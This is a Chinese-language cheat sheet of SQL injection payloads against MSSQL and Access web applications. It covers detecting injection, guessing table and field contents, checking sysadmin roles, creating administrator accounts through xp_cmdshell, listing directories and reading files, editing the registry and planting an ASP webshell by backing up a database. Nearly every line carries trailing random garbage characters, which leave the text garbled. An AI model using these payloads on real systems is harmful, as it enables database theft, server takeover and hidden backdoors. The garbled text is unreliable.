1.判断是否有注入;and 1=1 ;and 1=2 "�E|r��3cN
2.初步判断是否是mssql ;and user>0 AOx3QgC^NO
Owpg]p yVD
3.注入参数是字符'and [查询条件] and ''=' NZC='3��Uz
N��3yB1_ �
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 1|WpK�aMoq
t-m9n*\�j1
5.判断数据库系统 kad;Wa�#h�
W�j j2J�8B
;and (select count(*) from sysobjects)>0 mssql ���s�p
Q4m
�z2Y_L8u�2
;and (select count(*) from msysobjects)>0 access W��+f&%En�
-V
u/T��T0
(d'�j'U:C�
dHq )vs,L
6.猜数据库 ;and (select Count(*) from [数据库名])>0 e9`uD|KAS|
wv��mg)4�,
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �3h�XmYz�(
b;J0'o^�G|
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 hH��c^Z��A
RQ�p�IB�sj
9.(1)猜字段的ascii值(access) �f�>)T��q'
�Q�Pe9s�[Y
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 uH&,%k9GVK
{���eswe�
(2)猜字段的ascii值(mssql) !P~ PF:W~|
|pH�*
CC�A
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 'y6�!�%k�*
�=,d* {m~A
10.测试权限结构(mssql) �#x5�N{��8
w��3�8�c��
�|�J<�pL�z
�~�1=.�?Ho
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �[+�'B���Q
g�|���._n�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- f�ATA%eA8;
�C^,4`O��I
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- &��V#z�k�W
�6A$_&�?��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 2z.8rNw��T
6L8t�z��8�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Rnj� Jg?I=
5]H))}9>d�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- -�4�vHK!l�
�(K*�/Vp��
;and 1=(select IS_MEMBER('db_owner'));-- (~G�5�t(+�
Gf
H*,1x�
3|�K=%jr[
-�7k|6"EwM
11.添加mssql和系统的帐户 5BU%�%fBJ.
Ig��0�2M�_
;exec master.dbo.sp_addlogin username;-- �\,�l.p_<
;exec master.dbo.sp_password null,username,password;-- hY.e��[�+�
x�&R9${�e%
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- h0F0d�^W�.
P� /c
Q�1
;exec master.dbo.xp_cmdshell 'net user username password Z�k/�' \(5
�'9-axIj70
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- O&#�S4]Y �
`;5��VH�]V
;exec master.dbo.xp_cmdshell 'net user username password /add';-- "%oH��@
�=
_K0izKTA�.
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- HPt�Tv}l�
V8sH{�R-��
GUu\dl9WA'
�~��?A�C�:
12.(1)遍历目录 O t *K+�^I
`26V`%bPkr
;create table dirs(paths varchar(100), id int) 0'yG1���qG
S�,�*{q(��
;insert dirs exec master.dbo.xp_dirtree 'c:\' NK�7H,V}�T
c<=�`<!FS[
;and (select top 1 paths from dirs)>0 5�)��d,G9
sf ��|oNOz
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) YN,y0t/cQ�
vzY'+�9q1.
JrCf,�?L�^
mL:m;>JJ n
(2)遍历目录 DKy�>]�Hca
c*x J=Gz6d
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �QKp+;$SE'
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 +cz"`T`X 2
7�tpA�Z<�{
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Mx�O�
W)$f
3>-�[B`dD(
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �@J��b@��L
R���k($lW)
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 zmrQf/y{R
O.@g�/05�C
,wtFs!8��
M82.khm~jM
13.mssql中的存储过程 8hTR*e�!�+
L6|Hgrj�-u
xp_regenumvalues 注册表根键, 子键 =
n�+�q_.A
��81G�Qijq
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 >��I$�B=��
dT5J-70Fl�
xp_regread 根键,子键,键值名 O�n#�;)35M
b#D�9�eJhS
;exec xp_regread 2�[jL^�XMM
��Ik`O.Q.}
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 F(Lb8\to\M
o3Mf:;2c�C
xp_regwrite 根键,子键, 值名, 值类型, 值 BZovtm3�E
b8rp8'M)
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �W|)G�V0YM
oN *SR�aAp
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��kQ@gO[hS
9@��:BK;Fi
xp_regdeletevalue 根键,子键,值名 Q�CeMKjCmY
H@K#|A=�a�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �y,M�PGW�_
�=yl4zQmg$
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 v1�����LKU
E�kN��_8(w
OE�N�z�G~�
R=�!kbBK>\
14.mssql的backup创建webshell Q;4}gUm�I$
L +�L�9Y�}
use model ;��tJWO�m�
T"�n{WmV�Q
create table cmd(str image); �-glugVq�
JZ��`�>|<W
insert into cmd(str) values (''); 8O,?�|c=�>
^�'m\D;��
backup database model to disk='c:\l.asp'; *6:�v}#b[�
�^�#��]c0�
xC<��=~�(�
qs=Gj?GwGQ
15.mssql内置函数 4HM;�K_G%{
�+T9�Q_e*�
;and (select @@version)>0 获得Windows的版本号 eym�i2-a�<
�? m&IF<b�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa =v�.{�JV�#
he"L*p*H��
;and (select user_name())>0 爆当前系统的连接用户 O/mR�9��[}
F�"�!agc2!
;and (select db_name())>0 得到当前连接的数据库 \Ke8�W,)ew
���1Fv8�T'
T�YYp"w��x
2b5��#PcKa
16.简洁的webshell ��+�a�|�"{
59.$ULQVMY
use model X4a^m�w\"�
}i(qt&U;�
create table cmd(str image); !{�;[xXK4M
�! 0^��;;'
insert into cmd(str) values (''); ]f�j-�`==�
^V[/��(L�q
backup database model to disk='g:\wwwtest\l.asp';
